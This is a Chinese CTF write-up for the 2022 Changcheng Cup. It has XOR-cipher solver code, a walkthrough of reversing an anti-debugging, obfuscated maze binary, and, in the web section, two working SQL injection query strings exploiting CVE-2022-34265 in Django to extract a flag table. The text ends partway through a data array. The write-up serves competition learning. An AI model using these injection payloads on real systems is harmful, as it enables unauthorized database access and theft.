2022 长城杯政企组 wp

2022 长城杯政企组 wp

这次比赛实际并列26名,前15名进入线下复赛,感觉距离线下赛越来越近了。Crypto简单题秒了,因为上班没有抢到前三拿加分,最后这道题第五。然后其余四个小时全部给了re的rabbit_hole,把大致的流程梳理出来了,但是卡在了异常处理,导致最后核心代码没有能够看到并且F5解析。队友做出来web题,赛后看了看misc的办公室爱情,也没用多少时间。如果比赛时候做了说不定就进复赛了?不可能的!没看规则,完全没有记得开录屏。马上打网鼎杯,不要忘了!

那天打完比赛,Re没做出来实在气不过,于是联系了好多年没联系的传奇人物刘大爷,请刘大爷出山给我指点迷津,刘大爷把题秒了,给我讲了两点,立马全都解决了,果然是刘大爷,这个wp大部分功劳是刘大爷的。

Crypto - xor

task.py:

import os
from secret import flag

def cut(obj, sec):
    """Split obj into consecutive slices of length sec.

    The last slice is shorter when len(obj) is not a multiple of sec;
    an empty obj yields an empty list.
    """
    pieces = []
    for start in range(0, len(obj), sec):
        pieces.append(obj[start:start + sec])
    return pieces

x = 6  # block length: the flag is processed six bytes at a time
assert flag.startswith('flag{')
assert flag.endswith('}')
m = cut(flag, x)

pad = os.urandom(x)  # six secret key bytes, never printed
res = []
for block in m:
    # Each output byte is a pure XOR of a few plaintext bytes and a few pad
    # bytes, so the whole scheme is linear over XOR.
    b0, b1, b2, b3, b4, b5 = block[0], block[1], block[2], block[3], block[4], block[5]
    p0, p1, p2, p3, p4, p5 = pad[0], pad[1], pad[2], pad[3], pad[4], pad[5]
    res.append([
        b0 ^ b1 ^ b2 ^ p0,
        b3 ^ b4 ^ p1 ^ p2,
        p5 ^ b5 ^ p1 ^ p3,
        b3 ^ p3 ^ p4 ^ p1,
        b5 ^ p0 ^ b4 ^ p1,
        b2 ^ b4 ^ p0 ^ p1,
        b2 ^ b0 ^ b4 ^ p4,
    ])

print(res)
#[[150, 194, 49, 195, 23, 79, 66], [194, 136, 63, 147, 3, 2, 81], [132, 221, 57, 144, 83, 83, 93], [208, 223, 37, 193, 28, 0, 70], [154, 203, 108, 156, 28, 78, 68], [159, 221, 62, 146, 86, 82, 88], [197, 141, 117, 192, 31, 90, 85]]

入门题目,“flag{”是flag的前5位,然后是一个7元的方程,求pad6个数和flag{后一位有7个方程正好可以解。用z3即可。

from z3 import *
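# Recover the pad from the known prefix "flag{", then invert every block.
#
# task.py's output is a purely linear system over XOR: each output byte is the
# XOR of some plaintext bytes and some pad bytes.  With the first five
# plaintext bytes fixed to b"flag{", the seven equations of the first block
# determine all six pad bytes and the sixth plaintext byte uniquely, so the
# SMT solver is unnecessary: each equation can be rearranged for the single
# unknown it introduces and solved one after another.

KNOWN_PREFIX = b"flag{"

ans = [[150, 194, 49, 195, 23, 79, 66], [194, 136, 63, 147, 3, 2, 81], [132, 221, 57, 144, 83, 83, 93], [208, 223, 37, 193, 28, 0, 70], [154, 203, 108, 156, 28, 78, 68], [159, 221, 62, 146, 86, 82, 88], [197, 141, 117, 192, 31, 90, 85]]


def recover_pad(prefix, block):
    """Return (pad, sixth_plaintext_byte) from the first output block.

    prefix: the five known plaintext bytes i[0..4] of that block.
    block:  its seven output bytes as printed by task.py.

    The order of the assignments matters: every line is one task.py
    equation rearranged for a new unknown and reuses earlier results.
    """
    i0, i1, i2, i3, i4 = prefix[0], prefix[1], prefix[2], prefix[3], prefix[4]
    c = block
    pad0 = c[0] ^ i0 ^ i1 ^ i2          # tmp[0] = i0 ^ i1 ^ i2 ^ pad0
    pad1 = c[5] ^ i2 ^ i4 ^ pad0        # tmp[5] = i2 ^ i4 ^ pad0 ^ pad1
    pad4 = c[6] ^ i2 ^ i0 ^ i4          # tmp[6] = i2 ^ i0 ^ i4 ^ pad4
    pad3 = c[3] ^ i3 ^ pad4 ^ pad1      # tmp[3] = i3 ^ pad3 ^ pad4 ^ pad1
    pad2 = c[1] ^ i3 ^ i4 ^ pad1        # tmp[1] = i3 ^ i4 ^ pad1 ^ pad2
    flag5 = c[4] ^ pad0 ^ i4 ^ pad1     # tmp[4] = i5 ^ pad0 ^ i4 ^ pad1
    pad5 = c[2] ^ flag5 ^ pad1 ^ pad3   # tmp[2] = pad5 ^ i5 ^ pad1 ^ pad3
    return [pad0, pad1, pad2, pad3, pad4, pad5], flag5


def decrypt_block(block, pad):
    """Invert one 7-byte output block back into its 6 plaintext bytes.

    Six of the seven equations are solved in dependency order; the
    remaining one (tmp[1]) is redundant and used as a consistency check.
    Returns None when that check fails, i.e. block and pad do not match.
    """
    c = block
    f5 = c[2] ^ pad[5] ^ pad[1] ^ pad[3]
    f3 = c[3] ^ pad[3] ^ pad[4] ^ pad[1]
    f4 = c[4] ^ f5 ^ pad[0] ^ pad[1]
    f2 = c[5] ^ f4 ^ pad[0] ^ pad[1]
    f0 = c[6] ^ f2 ^ f4 ^ pad[4]
    f1 = c[0] ^ f0 ^ f2 ^ pad[0]
    if f3 ^ f4 ^ pad[1] ^ pad[2] != c[1]:
        return None
    return bytes([f0, f1, f2, f3, f4, f5])


pad_, _flag5 = recover_pad(KNOWN_PREFIX, ans[0])
#print(pad_)
#[253, 168, 118, 50, 62, 146]

flag_ = ""
for block in ans:
    plain = decrypt_block(block, pad_)
    if plain is None:
        print('Error')
    else:
        # chr() of each byte, as the z3 version did
        flag_ += plain.decode('latin-1')

print(flag_)
#flag{98167a7e-1471-11ed-a068-da12656dd8d7}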

Web - djangogogo

这题题解是队友写的。

CVE-2022-34265 Django Extract & Trunc SQL注入漏洞

参考资料:http://www.ctfiot.com/47944.html

由于字符长度限制。用/?name=YEAR FROM sale_datetime)) and updatexml(1,concat(1,(select flag from flag),1),1)--获取前半截flag。

1661257426458
1661257426458

/?name=YEAR FROM sale_datetime)) and updatexml(10,concat((select RIGHT(flag,14) from flag ),1,1,1,1,1,1,1,1),1)--获得后半段flag。

1661257431800
1661257431800

Misc - 办公室爱情

有大佬师傅写出来了:https://blog.csdn.net/weixin_44418623/article/details/126493352

[题目下载][办公室爱情](办公室爱情.zip)

Reverse - rabbit hole

这道题拿到以后运行起来,看起来像很朴素的题目,并且通过Exeinfo,并没有什么壳。

1661446868005
1661446868005

然后用ida运行,找到main函数0x004016C0,发现完全不能F5。仔细看有两种花指令。第一种:

1661447008186
1661447008186

这种可以直接patch掉EB FF中EB这一位,变成nop(90),然后在40170A地址上按C转换为code,就可以看到后面的指令了。第二种:

1661447155378
1661447155378

这种往上jmp的第一次见。经过尝试可以patch掉4017D5和4017D6两个地址为nop,然后nop掉jmp语句后面的五个地址4017D9到4017DD也nop掉。这种花指令就完成了。

1661447330411
1661447330411

经过一顿漫长的操作,找到main函数的retn,从main函数push ebp开始选中到retn,按p,再f5终于可以看出main函数的全貌了。

// Decompiled main() after the junk-instruction patches described above.
// What is visible here: read one line, hash its length to choose between
// two branches, and in the length-134 branch compare 40 bytes produced by
// sub_4014E0 against byte_404BC0.
int __cdecl main(int argc, const char **argv, const char **envp)
{
/*
A pile of local variable declarations is omitted here; pay attention to the variable types.
*/

v31[0] = v3;
v31[1] = retaddr;
v4 = alloca(4532);
atexit(sub_401660);  // exit handler registered before any input is read
sub_401A40();
gets_s(v29, 0x100u);  // the input line goes into v29, at most 0x100 bytes
v5 = strlen(v29);
// Byte-wise hash of the 32-bit length: start from (low byte ^ 0x50C5D1F),
// then for each higher byte multiply by 16777619 (0x01000193) and XOR the
// byte in, up to HIBYTE.  The brute force below finds which lengths hit
// the two constants compared against v7.
v6 = BYTE2(v5) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F))));
v7 = HIBYTE(v5) ^ (16777619 * v6);
if ( v7 != 1166501587 )  // 1166501587 == 0x458766D3, i.e. length 134 (brute force below)
{
if ( v7 == 1563082853 )  // 1563082853 == 0x5D2AC065, i.e. length 16
{
// Length-16 branch.  Both loop bounds are the same length hash, so each
// loop runs until its counter hashes to 0x5D2AC065 (16 per the brute
// force below): v28 accumulates sum(v29[j] * byte_404AC0[i + j]) with i
// advancing by 16, i.e. a 16x16 matrix times the input, stored at
// v31[-1130] and then compared byte-for-byte against byte_404AAC.
v8 = 0;
for ( i = 0; ; i = v9 + 16 )
{
v25 = v8;
if ( (HIBYTE(v8) ^ (16777619
* (BYTE2(v8) ^ (16777619 * (BYTE1(v8) ^ (16777619 * ((unsigned __int8)v8 ^ 0x50C5D1F))))))) == 1563082853 )
break;
v28 = 0;
v9 = i;
for ( j = 0; ; j = v26 + 1 )
{
v26 = j;
if ( (HIBYTE(j) ^ (16777619
* (BYTE2(j) ^ (16777619 * (BYTE1(j) ^ (16777619 * ((unsigned __int8)j ^ 0x50C5D1F))))))) == 1563082853 )
break;
v9 = i;
v28 += v29[v26] * byte_404AC0[i + v26];
}
v11 = v25;
*((_BYTE *)&v31[-1130] + v25) = v28;
v8 = v11 + 1;
}
for ( k = 0;
(HIBYTE(k) ^ (16777619 * (BYTE2(k) ^ (16777619 * (BYTE1(k) ^ (16777619 * ((unsigned __int8)k ^ 0x50C5D1F))))))) != 1563082853;
++k )
{
if ( *((_BYTE *)&v31[-1130] + k) != byte_404AAC[k] )
{
// Mismatch: print something via the stream returned by sub_401A40 and exit.
v13 = sub_401A40();
std::ostream::operator<<(v13);
exit(-1);
}
}
// All 16 bytes matched; the decompiler could not follow the control flow
// past here (JUMPOUT), which is why the writeup treats this branch as a decoy.
v14 = sub_401A40();
std::ostream::operator<<(v14);
JUMPOUT(0x401A17);
}
// Neither accepted length: print and exit.
v15 = sub_401A40();
std::ostream::operator<<(v15);
exit(-1);
}
// Length-134 branch.  A fixed pangram is copied into v30 and handed to
// sub_401000 together with v6 (the length hash before the HIBYTE step);
// v30 is then cleared and sub_4014E0 is called with the input v29.
// sub_4014E0 is the SEH-protected function discussed below.
strcpy(v30, "The quick brown fox jumps over the lazy dog.");
sub_401000(v30, v6);
memset(v30, 0, 40);
v17 = sub_4014E0(v30, v29, v16);
// 40 result bytes in v30 are compared against byte_404BC0.
for ( m = 0; m < 40; ++m )
{
LOBYTE(v17) = v30[m];
if ( (_BYTE)v17 != byte_404BC0[m] )
{
// The mismatch path is not meaningful as decompiled (an indirect call
// through v17 + 1284029000 and a JUMPOUT): IDA did not analyze the
// exception-handler code that really runs here.
v22 = (*(int (**)(void))(v17 + 1284029000))();
byte_402FFF[v22 - 4206718] += BYTE1(v23);
*(_BYTE *)(v23 - 23) += v24;
JUMPOUT(0x401A3D);
}
}
// All 40 bytes matched: print via the stream and return.
v19 = sub_401A40();
v20 = std::ostream::operator<<(v19);
(*(void (**)(void))(v20 - 62026936))();
return 0;
}

第一个需要逆向的地方是v6 = BYTE2(v5) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F)))); v7 = HIBYTE(v5) ^ (16777619 * v6);if ( v7 != 1166501587 )

其中v5是输入字符串的长度,类型为int,四个字节。BYTE1是v5第二个字节,BYTE2是v5第三个字节,HIBYTE是最高字节,注意C语言变量是小端序。这段代码就是最小的字节和0x50C5D1F异或以后,乘以16777619,再和下一个字节异或,直到最高字节。于是python脚本:

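def hash_len(v):
    """Replicate the binary's hash of the 32-bit strlen() result.

    Starting from (v & 0xFF) ^ 0x50C5D1F, each higher byte of v is folded
    in as byte ^ (0x1000193 * h), everything reduced mod 2**32.  The
    decompiled code reads BYTE1, BYTE2 and HIBYTE of the int, i.e. bits
    8-15, 16-23 and 24-31; the original script shifted the last byte by 32,
    which only went unnoticed because it never tried a value above 255.
    """
    mask = 0xFFFFFFFF
    h = (v & 0xFF) ^ 0x50C5D1F
    for shift in (8, 16, 24):
        h = ((v >> shift) & 0xFF) ^ ((0x1000193 * h) & mask)
    return h


# Which input lengths reach the two branches of main()?
for i in range(256):
    v9 = hash_len(i)
    if v9 == 0x458766D3 or v9 == 0x5D2AC065:
        print(hex(v9), i)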
0x5d2ac065 16
0x458766d3 134

这里有两个分支,长度为134的分支是正确的。长度是16的分支进入下面的代码

1661448528575
1661448528575
1661448555663
1661448555663

无论结果是啥都进入了0x401A40的地址,猜测一下,结合下文,很容易知道这段不是需要走的分支。(比赛时候我动调进去了,查了小一会儿发现不对,还是too young!这题应该有反调试,可能是SEH的,我的x96dbg有过反调插件sharpOD。ida直接动调不行的。)

之后,有个关键函数0x4014E0很可疑,调用了输入变量v29。

1661448781490
1661448781490

经过一通patch后f5看到函数4014E0。发现关键语句ms_exc.registration.TryLevel = 0

这是try except的特征。tab进入汇编视图发现有try,并且在0x401546产生了异常,进入except。当时看到了 https://bbs.pediy.com/thread-252152.htm 这篇大佬师傅写的文章,也研究了一下,动调在这里也断掉了一直挂。怎么也搞不通,直到比赛结束,我还是个老菜鸡。

1661448903235
1661448903235

这个异常最后进入了0x4011E0这个函数,这是比赛中调到的地方。

1661449148944
1661449148944

比赛结束之后,晚上问大爷,大爷解释:1、这个异常是void x() {char a[0];a[1145141919810];}

2、SEH 反调试的原理是,遇到异常的时候会首先交给调试器,单步过不去。调试器需要改参数。

1661449598278
1661449598278

忽略范围-开始-C0000005-确定。添加了这个就不会在0x401546卡住了。接着在exception handler下个断点可以进入0x4011E0这个最后的函数了。最后的函数中,也是一个try exception跳到exception欺骗ida,ida确实不分析exception handler 里的代码。之后经过大爷提示,在异常代码地址patch,用jmp直接跳到exception handler就行。把0x401232地址patch成jmp到0x401278,并且把0x401278上的try except的code也patch掉了。

1661450025162
1661450025162
1661450043745
1661450043745

f5后得到了最后的函数,核心部分:

  v1 = 0;  // v1: index of the current input character
v10 = 0;
v2 = input;
if ( !strlen(input) )  // also entered through LABEL_21 once the whole input has been consumed
{
LOWORD(v4) = 0;
LOWORD(v5) = 0;
LABEL_21:
// Final check: the same byte-wise length hash as in main(), applied to the
// coordinates.  1636823865 == 0x618FF339, which the brute force below maps
// to 20.  As decompiled the two tests are joined with &&, so the failure
// branch is taken only when neither of them hashes to the target; the
// writeup treats the required end position as (20, 20).
if ( (HIBYTE(v18) ^ (16777619
* (BYTE2(v18) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F))))))) != 1636823865
&& (HIBYTE(v17) ^ (16777619
* (BYTE2(v17) ^ (16777619 * (BYTE1(v4) ^ (16777619 * ((unsigned __int8)v4 ^ 0x50C5D1F))))))) != 1636823865 )
{
puts(v9);
exit(-1);
}
// Success: 41 bytes of v12[i] + v14[i] are printed, then the program exits.
for ( i = 0; i < 41; ++i )
putchar((unsigned __int8)(*((_BYTE *)v12 + i) + *((_BYTE *)v14 + i)));
putchar(10);
exit(0);
}
v3 = 0;   // always 21 * v5 below: row offset into the two 441-entry tables
v16 = 0;
v4 = 0;   // second coordinate (column, stride 1)
v5 = 0;   // first coordinate (row, stride 21)
while ( 1 )
{
v6 = v2[v1];
switch ( v6 )  // one move per input character, vi-style h/j/k/l
{
case 'h':  // v5 - 1 (row up)
v18 = --v5;
v3 -= 21;
v16 = v3;
goto LABEL_12;
case 'j':  // v5 + 1 (row down)
v18 = v5 + 1;
v16 = v3 + 21;
v4 = v17;
++v5;
v3 += 21;
v1 = v10;
v2 = input;
goto LABEL_12;
case 'k':  // v4 - 1 (column left)
--v4;
break;
case 'l':  // v4 + 1 (column right)
++v4;
break;
default:  // any other byte: no movement, but the cell check still runs
goto LABEL_12;
}
v17 = v4;
LABEL_12: // the step check
// A step is legal only if 0 <= v5, v4 < 21 and the cell at index
// 21*v5 + v4 satisfies v5 ^ (v4 << 8) ^ dword_4043C8[idx] ^ byte_404208[idx] == 1.
// Anything else terminates the program at once.
if ( v5 < 0
|| v4 < 0
|| v5 >= 21
|| v4 >= 21
|| (v5 ^ (v4 << 8) ^ dword_4043C8[v3 + v4] ^ (unsigned __int8)byte_404208[v3 + v4]) != 1 )
{
exit(-1);
}
v10 = ++v1;
v7 = strlen(v2);
v3 = v16;
v2 = input;
if ( v1 >= v7 )  // input exhausted: go to the end-position check
goto LABEL_21;
}
}

这显然是一个迷宫。Label12是判断条件,Label21的if满足以后,就可以真正得到flag。

先满足Label21的if:

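def hash_len(v):
    """Replicate the binary's byte-wise hash of a 32-bit value.

    Starting from (v & 0xFF) ^ 0x50C5D1F, each higher byte is folded in as
    byte ^ (0x1000193 * h) mod 2**32.  HIBYTE is bits 24-31, so the top
    byte is taken with a shift of 24 (the original script used 32, which
    is harmless only for values below 256).
    """
    mask = 0xFFFFFFFF
    h = (v & 0xFF) ^ 0x50C5D1F
    for shift in (8, 16, 24):
        h = ((v >> shift) & 0xFF) ^ ((0x1000193 * h) & mask)
    return h


# Which coordinate (0..21 are the only values the maze allows) passes LABEL_21?
for v7 in range(22):
    if hash_len(v7) == 0x618FF339:
        print(v7)
#20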

迷宫出口是20,20。判断的条件Label12是位置和两个数组的异或,网上找了一段大佬的走迷宫算法改一下,便可以求出来flag。

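dirs=[(0,1),(1,0),(0,-1),(-1,0)]  # (row, col) offsets of the four neighbours; the order decides which branch the DFS tries first
path=[]  # positions of the path found, appended on the way back out of the recursion: exit first, start last

MAZE_SIZE = 21  # the binary rejects any coordinate outside 0..20


def mark(maze,pos):
    """Mark position pos of maze as visited by storing -1 there."""
    maze[pos[0]][pos[1]]=-1


def passable(maze,pos):
    """Return True if pos is inside the grid and an open, unvisited cell.

    An open cell satisfies the binary's LABEL_12 test
    cell ^ row ^ (col << 8) == 1; a visited cell holds -1 and never does.
    (The original listing returned the undefined name `false` here.)
    """
    row, col = pos
    if row < 0 or row >= MAZE_SIZE or col < 0 or col >= MAZE_SIZE:
        return False
    return maze[row][col] ^ row ^ (col << 8) == 1


def find_path(maze,pos,end):
    """Depth-first search from pos to end.

    Fills the module-level `path` (exit first) and returns True when the
    exit is reachable, False otherwise.  Visited cells are marked in maze.
    """
    mark(maze,pos)
    if pos==end:
        print(pos,end=" ")  # reached the exit
        path.append(pos)
        return True
    for dr, dc in dirs:
        nextp = (pos[0]+dr, pos[1]+dc)
        if passable(maze,nextp) and find_path(maze,nextp,end):
            print(pos,end=" ")
            path.append(pos)
            return True
    return False


def moves_from_path(path):
    """Turn a path (exit first, start last) into the binary's h/j/k/l string.

    'h'/'j' change the row by -1/+1 and 'k'/'l' change the column by -1/+1.
    Because the path is stored backwards, each element is compared with its
    successor (the earlier position) and the result is reversed at the end.
    """
    moves = []
    for (r_later, c_later), (r_earlier, c_earlier) in zip(path, path[1:]):
        dx = r_earlier - r_later
        dy = c_earlier - c_later
        if dx == 1:
            moves.append("h")
        if dx == -1:
            moves.append("j")
        if dy == -1:
            moves.append("l")
        if dy == 1:
            moves.append("k")
    return "".join(reversed(moves))


def see_path(maze,path):
    """Mark the found path in maze (E = exit, S = start, -2 between) and print the move string."""
    for i,p in enumerate(path):
        if i==0:
            maze[p[0]][p[1]] ="E"
        elif i==len(path)-1:
            maze[p[0]][p[1]]="S"
        else:
            maze[p[0]][p[1]] =-2
    print("\n")
    print(moves_from_path(path))


def build_maze(dwords, bytes_):
    """Combine the two tables from the binary into a 21x21 grid of cell values (dword ^ byte).

    Only the first 441 entries of each table are used; the byte table is
    padded with zeros past that in the binary.
    """
    cells = [dwords[i] ^ bytes_[i] for i in range(MAZE_SIZE * MAZE_SIZE)]
    return [cells[r * MAZE_SIZE:(r + 1) * MAZE_SIZE] for r in range(MAZE_SIZE)]


byte_404208 = [0x45, 0x24, 0xBD, 0x3E, 0x32, 0x9D, 0x8F, 0x53, 0xCC, 0x4F, 0x8D, 0x2C, 0x7C, 0xF2, 0xBA, 0x30, 0x0D, 0xC7, 0x57, 0x19, 0x91, 0xF4, 0xE6, 0x28, 0x4F, 0xEE, 0x47, 0x7C, 0xD8, 0xF8, 0xD8, 0x79, 0xD1, 0x7A, 0x32, 0x82, 0xD9, 0xDF, 0x20, 0xD6, 0xEF, 0x5E, 0x24, 0x6E, 0x67, 0xB4, 0x9D, 0x49, 0xCA, 0xDD, 0x64, 0x9D, 0x0E, 0x2F, 0x0E, 0xBD, 0x1B, 0x81, 0xF3, 0x6B, 0x5F, 0xA1, 0xAC, 0x0E, 0x66, 0x76, 0x3F, 0xBF, 0x80, 0x94, 0x86, 0x44, 0xA9, 0xB8, 0xB8, 0xFE, 0xB5, 0x1A, 0x94, 0x6F, 0x3B, 0x64, 0xF6, 0x82, 0x76, 0x0A, 0x28, 0xAB, 0x8D, 0xB7, 0xB7, 0xC1, 0x0F, 0x1A, 0x3A, 0xFC, 0x77, 0x71, 0xE6, 0x5F, 0x3C, 0x9F, 0xEC, 0x3A, 0x83, 0xAF, 0x32, 0x9D, 0x43, 0xD6, 0xD0, 0x9B, 0x14, 0xBD, 0x78, 0xDC, 0xD6, 0xC2, 0x1D, 0x54, 0xB3, 0xCE, 0xF8, 0x71, 0x92, 0x44, 0x85, 0xA2, 0x58, 0xEF, 0x80, 0x2F, 0xF0, 0x90, 0xF4, 0xAB, 0xDB, 0x63, 0x74, 0xE1, 0xBB, 0xCA, 0xC5, 0xAC, 0x39, 0xA7, 0x56, 0x45, 0x25, 0xAA, 0xCA, 0x2A, 0x30, 0x95, 0xDC, 0x17, 0x31, 0x4F, 0x62, 0x39, 0xA4, 0x1C, 0x93, 0xE1, 0xA9, 0x2F, 0xB3, 0x4F, 0x26, 0x53, 0x47, 0x23, 0xDB, 0x34, 0xDE, 0xC1, 0x27, 0x5F, 0xEB, 0x2E, 0x91, 0x5E, 0xCA, 0xCB, 0xD6, 0x11, 0xA3, 0x8F, 0x47, 0xDD, 0xC0, 0xFB, 0xEE, 0xCF, 0xC9, 0xCA, 0xD9, 0xF8, 0xB9, 0x15, 0x34, 0x23, 0x6B, 0x6D, 0x28, 0xF6, 0xE2, 0x1E, 0xF8, 0xFF, 0xEB, 0xFB, 0xE9, 0x70, 0x5C, 0xD4, 0xED, 0x78, 0xD4, 0x7A, 0x22, 0x1C, 0x69, 0xF1, 0x39, 0x61, 0xC2, 0xB9, 0x7B, 0xF3, 0xC2, 0xA2, 0x99, 0x64, 0x48, 0xAC, 0x38, 0x55, 0x0C, 0xB3, 0x0B, 0xD6, 0x9B, 0x46, 0x70, 0x8B, 0xCD, 0x0F, 0x87, 0xCB, 0x7F, 0xE0, 0xAB, 0x4A, 0xCB, 0x79, 0x43, 0xE2, 0x60, 0x15, 0x0A, 0x7C, 0x0A, 0xD9, 0x15, 0x41, 0xF3, 0x2C, 0x2C, 0x61, 0x14, 0xC1, 0x43, 0xA5, 0x1A, 0xC7, 0x33, 0xC9, 0x89, 0xB7, 0x37, 0xC4, 0x57, 0x81, 0x23, 0xCA, 0xD4, 0xF1, 0x7E, 0xF4, 0x65, 0x8D, 0x72, 0x6B, 0xA4, 0x9A, 0xEE, 0xAC, 0xBA, 0x71, 0x4E, 0xDE, 0x6A, 0x88, 0x36, 0x1D, 0x72, 0xB1, 0xF0, 0x9B, 0x69, 0x19, 0xB0, 0x7C, 0xEA, 0xF7, 0x51, 0x62, 0xD1, 0x3A, 0x67, 0x56, 0x66, 0xBA, 0x79, 0x59, 0x66, 0xB1, 0xC5, 0x8F,
0xE9, 0x6C, 0x99, 0x3C, 0xF0, 0x89, 0xF6, 0xBF, 0x15, 0x61, 0x92, 0xE0, 0x60, 0x3E, 0x59, 0x35, 0x4B, 0x1F, 0x6F, 0x65, 0xE4, 0x71, 0x0D, 0x7B, 0x6E, 0x93, 0x14, 0x5D, 0x4C, 0x6F, 0x2F, 0x52, 0xA6, 0x5D, 0x90, 0x7B, 0xCC, 0xE1, 0x69, 0x77, 0x7E, 0x8D, 0x33, 0x6B, 0x37, 0xC4, 0x2F, 0xBF, 0x6F, 0xBF, 0xA8, 0xB3, 0x61, 0x5C, 0xD2, 0xC2, 0x2D, 0xC8, 0xF4, 0xBB, 0xB2, 0xD0, 0x22, 0x9C, 0x75, 0xDF, 0x59, 0x72, 0xAA, 0xFD, 0x7E, 0x67, 0x2E, 0x61, 0xBA, 0x6B, 0x4B, 0x19, 0xA6, 0xD5, 0x11, 0x15, 0xBC, 0x91, 0xEB, 0x42, 0xCC, 0x72, 0xB2, 0xC6, 0x47, 0xA3, 0xCC, 0xAC, 0x6C, 0xA8, 0xD8, 0xCA, 0xD2, 0x84, 0x2B, 0x35, 0xAB, 0xAF, 0xC8, 0xA5, 0x2F, 0x7F, 0x7F, 0xF5, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]

dword_4043C8 = [0x00000044, 0x00000124, 0x000002BD, 0x0000033E, 0x00000432, 0x0000059D, 0x0000068F, 0x00000753, 0x000008CC, 0x0000094F, 0x00000A8D, 0x00000B2C, 0x00000C7C, 0x00000DF2, 0x00000EBA, 0x00000F30, 0x0000100D, 0x000011C7, 0x00001257, 0x00001319, 0x00001491, 0x000000F4, 0x000001E7, 0x00000229, 0x0000034F, 0x000004EE, 0x00000547, 0x0000067C, 0x000007D8, 0x000008F8, 0x000009D8, 0x00000A79, 0x00000BD1, 0x00000C7A, 0x00000D32, 0x00000E82, 0x00000FD9, 0x000010DF, 0x00001120, 0x000012D6, 0x000013EE, 0x0000145F, 0x00000027, 0x0000016C, 0x00000265, 0x000003B7, 0x0000049F, 0x0000054B, 0x000006C8, 0x000007DF, 0x00000866, 0x0000099F, 0x00000A0C, 0x00000B2D, 0x00000C0C, 0x00000DBF, 0x00000E19, 0x00000F83, 0x000010F1, 0x00001169, 0x0000125C, 0x000013A3, 0x000014AE, 0x0000000C, 0x00000164, 0x00000274, 0x0000033D, 0x000004BD, 0x00000582, 0x00000696, 0x00000784, 0x00000846, 0x000009AB, 0x00000ABA, 0x00000BBA, 0x00000CFC, 0x00000DB7, 0x00000E18, 0x00000F96, 0x0000106C, 0x00001138, 0x00001267, 0x000013F5, 0x00001481, 0x00000072, 0x0000010E, 0x0000022C, 0x000003AF, 0x00000489, 0x000005B3, 0x000006B3, 0x000007C5, 0x0000080B, 0x0000091E, 0x00000A3E, 0x00000BF8, 0x00000C73, 0x00000D75, 0x00000EE2, 0x00000F5A, 0x00001038, 0x0000119A, 0x000012E9, 0x0000133F, 0x00001487, 0x000000AA, 0x00000137, 0x00000298, 0x00000346, 0x000004D3, 0x000005D5, 0x0000069E, 0x00000711, 0x000008B8, 0x0000097D, 0x00000AD9, 0x00000BD3, 0x00000CC7, 0x00000D18, 0x00000E51, 0x00000FB7, 0x000010CB, 0x000011FC, 0x00001274, 0x00001396, 0x00001441, 0x00000082, 0x000001A5, 0x0000025F, 0x000003E8, 0x00000487, 0x00000528, 0x000006F7, 0x00000797, 0x000008F3, 0x000009AC, 0x00000ADC, 0x00000B65, 0x00000C73, 0x00000DE6, 0x00000EBC, 0x00000FCD, 0x000010C3, 0x000011AB, 0x0000123F, 0x000013A0, 0x00001450, 0x00000043, 0x00000122, 0x000002AD, 0x000003CD, 0x0000042D, 0x00000537, 0x00000692, 0x000007DB, 0x00000810, 0x00000936, 0x00000A49, 0x00000B65, 0x00000C3E, 0x00000DA3, 0x00000E1B, 0x00000F95, 0x000010E6, 0x000011AF,
0x00001228, 0x000013B5, 0x00001448, 0x0000002F, 0x0000015B, 0x0000024E, 0x0000032A, 0x000004D2, 0x0000053C, 0x000006D6, 0x000007C9, 0x0000082F, 0x00000957, 0x00000AE2, 0x00000B26, 0x00000C98, 0x00000D57, 0x00000EC3, 0x00000FC2, 0x000010DE, 0x00001118, 0x000012AB, 0x00001386, 0x0000144F, 0x000000D5, 0x000001C9, 0x000002F3, 0x000003E7, 0x000004C6, 0x000005C0, 0x000006C2, 0x000007D1, 0x000008F0, 0x000009B0, 0x00000A1D, 0x00000B3D, 0x00000C2A, 0x00000D62, 0x00000E64, 0x00000F20, 0x000010FF, 0x000011EA, 0x00001217, 0x000013F0, 0x000014F6, 0x000000E0, 0x000001F0, 0x000002E2, 0x0000037B, 0x00000456, 0x000005DE, 0x000006E6, 0x00000772, 0x000008DF, 0x00000970, 0x00000A29, 0x00000B16, 0x00000C62, 0x00000DFB, 0x00000E33, 0x00000F6A, 0x000010C8, 0x000011B2, 0x00001271, 0x000013F8, 0x000014C8, 0x000000A9, 0x00000192, 0x0000026F, 0x00000342, 0x000004A7, 0x00000533, 0x0000065F, 0x00000707, 0x000008B9, 0x00000900, 0x00000ADC, 0x00000B90, 0x00000C4C, 0x00000D7B, 0x00000E81, 0x00000FC7, 0x00001004, 0x0000118D, 0x000012C0, 0x00001375, 0x000014EB, 0x000000A7, 0x00000147, 0x000002C6, 0x00000374, 0x0000044F, 0x000005EE, 0x0000066D, 0x00000719, 0x00000807, 0x00000970, 0x00000A07, 0x00000BD5, 0x00000C18, 0x00000D4D, 0x00000EFE, 0x00000F20, 0x00001021, 0x0000116C, 0x00001218, 0x000013CC, 0x0000144F, 0x000000A8, 0x00000117, 0x000002CA, 0x0000033F, 0x000004C5, 0x00000585, 0x000006BB, 0x0000073A, 0x000008C8, 0x0000095A, 0x00000A8D, 0x00000B2F, 0x00000CC6, 0x00000DD8, 0x00000EFD, 0x00000F73, 0x000010F8, 0x00001168, 0x00001280, 0x0000137E, 0x00001466, 0x000000AA, 0x00000194, 0x000002E0, 0x000003A2, 0x000004B4, 0x0000057F, 0x00000640, 0x000007D0, 0x00000865, 0x00000986, 0x00000A38, 0x00000B13, 0x00000C7C, 0x00000DBF, 0x00000EFE, 0x00000F95, 0x00001066, 0x00001117, 0x000012BE, 0x00001373, 0x000014E4, 0x000000F9, 0x0000015F, 0x0000026C, 0x000003DF, 0x00000434, 0x00000569, 0x00000658, 0x00000768, 0x000008B4, 0x00000976, 0x00000A56, 0x00000B68, 0x00000CBF, 0x00000DCB, 0x00000E81, 0x00000FE7,
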